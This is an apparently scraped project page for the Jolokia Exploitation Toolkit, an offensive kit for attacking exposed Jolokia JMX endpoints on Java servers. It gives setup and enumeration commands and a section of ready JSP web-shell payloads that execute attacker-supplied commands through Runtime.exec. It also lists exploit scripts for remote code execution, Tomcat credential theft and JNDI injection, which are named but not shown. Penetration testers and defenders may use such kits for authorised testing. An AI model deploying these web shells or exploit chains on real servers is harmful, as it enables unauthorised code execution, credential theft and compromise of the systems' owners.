Jolokia Exploitation Toolkit (JET) helps exploitation of exposed jolokia endpoints.

Last update: Jan 01, 2023

Overview

jolokia-exploitation-toolkit

Jolokia Exploitation Toolkit (JET) helps exploitation of exposed jolokia endpoints.

Core concept

Jolokia is a protocol bridge that enables users to interact with MBeans (JMB) through HTTP. This endpoint "exposed JMX features" which are often dangerous, this implies that /jolokia should never be exposed, and if used internally (loopback), should be protected by an authentication mechanism.

Doc says... :)

Jolokia is a JMX-HTTP bridge giving an alternative to JSR-160 connectors. It is an agent based approach with support for many platforms. In addition to basic JMX operations it enhances JMX remoting with unique features like bulk requests and fine grained security policies.

Where to find jolokia

Java projects
/jolokia
/actuator/jolokia
???

Test setup

You can either startup a tomcat server (docker || docker-compose) and install the jolokia war,
Or run docker run --rm -it --net=host bodsch/docker-jolokia and go with the flow ~

Setup & Usage

# Setup with virtualenv
virtualenv -p python3 .venv && source .venv/bin/activate
pip install -r requirements.txt

# Use jolokia-parser.py with remote url
python jolokia-parser.py http://127.0.0.1/jolokia | tee jolokia-parsed.lst
# Use jolokia-parser.py with local json
curl http://127.0.0.1/jolokia/list -o jolokia-list.json
python jolokia-parser.py jolokia-list.json | sed 's#^/jolokia#http://127.0.0.1/jolokia#g' | tee jolokia-parsed.lst

The expected output in jolokia-parsed.lst is the following:

http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor
[+] CLASS : javax.management.MBeanServerDelegate
[+] DESC  : Represents  the MBean server from the management point of view.
[+] DESC  : getRecordingOptions // returns javax.management.openmbean.TabularData
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/getRecordingOptions/$long
[+] DESC  : takeSnapshot // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/takeSnapshot
[+] DESC  : closeRecording // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/closeRecording/$long
[+] DESC  : newRecording // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/newRecording
[+] DESC  : setRecordingSettings // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/setRecordingSettings/$long/$javax.management.openmbean.TabularData
[+] DESC  : openStream // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/openStream/$long/$javax.management.openmbean.TabularData
[+] DESC  : cloneRecording // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/cloneRecording/$long/$boolean
[+] DESC  : setRecordingOptions // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/setRecordingOptions/$long/$javax.management.openmbean.TabularData
[+] DESC  : copyTo // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/copyTo/$long/$java.lang.String
[+] DESC  : startRecording // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/startRecording/$long
[...]

Java & JSP payloads

<%=Runtime.getRuntime().exec(request.getParameter(String.valueOf(42))).getInputStream()%> <%= new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("RESULT").next() %> ">

<% Runtime.getRuntime().exec(new String[] { "sh", "-c", "cmd" }); %>
<%=Runtime.getRuntime().exec(request.getParameter(String.valueOf(42))).getInputStream()%>
<%= new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("RESULT").next() %>

Contributors & Content

@TheLaluka
- jolokia-parser.py | Convert /jolokia/list or json blob to human-readable urls
- exploits/file-write-to-rce-vhost-jfr.md | File read and file write to RCE by deploying a vhost with MBeanFactory/createStandardHost and DiagnosticCommand/jfrStart
- exploits/file-read-compilerdirectivesadd.md | File read with DiagnosticCommand/compilerDirectivesAdd
- exploits/file-write-to-rce-vmLog.md | File write to RCE with DiagnosticCommand/vmLog
@Coiffeur0x90
- exploits/file-write-to-rce-valve.py | File write with Catalina:host=localhost,name=AccessLogValve (exploit)
- exploits/file-write-to-rce-valve.md | File write with Catalina:host=localhost,name=AccessLogValve (article)
- exploits/info-leak-tomcat-creds.py | Tomcat credentials leak with Users:database=UserDatabase,type=UserDatabase
@mpgn_x64
- exploits/jndi-logback.md | XXE to RCE with ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL
RicterZ
- exploits/jndi-injection-MBeanFactory.py | RCE with JNDI Injection (Tomcat EL) with MBeanFactory
@lely__
- exploits/jndi-ldap-target.md | RMI injection with java.lang:type=Memory
You should be here? Let me know and I'll fix that!

Jolokia Exploitation Toolkit (JET) helps exploitation of exposed jolokia endpoints.

Related tags

Overview

jolokia-exploitation-toolkit

Core concept

Where to find jolokia

Test setup

Setup & Usage

Java & JSP payloads

Contributors & Content

Sources & References

Owner

Laluka

Magicspoofing - A python3 script for search possible misconfiguration in a DNS related to security protections of email service from the domain name

SQLi Google Dork Scanner (new version)

RCE Exploit for Gitlab < 13.9.4

Detection And Breaking With Python

SSL / TLS Checking Tool written in Python3

Threat Intelligence Gathering 威胁情报收集，旨在提高蓝队拿到攻击 IP 后对其进行威胁情报信息收集的效率。

A simple tool to audit Unix/*BSD/Linux system libraries to find public security vulnerabilities

Web3 Pancakeswap Sniper & honeypot detector Take Profit/StopLose bot written in python3, For ANDROID WIN MAC & LINUX

Osint-Tool - Information collection tool in python

If you are worried about being found perhaps try taking cover under a blanket. Pure Python PowerShell Obfuscator

Looks at Python code to search for things which look "dodgy" such as passwords or diffs

Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more.

This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.

Anti Supercookie - Confusing the ISP & Escaping the Supercookie

This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).

Discord Region Swapping Exploit (VC Overload)

解密哥斯拉webshell管理工具流量

SSH Tool For OSINT and then Cracking.

Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228

DNS hijacking via dead records automation tool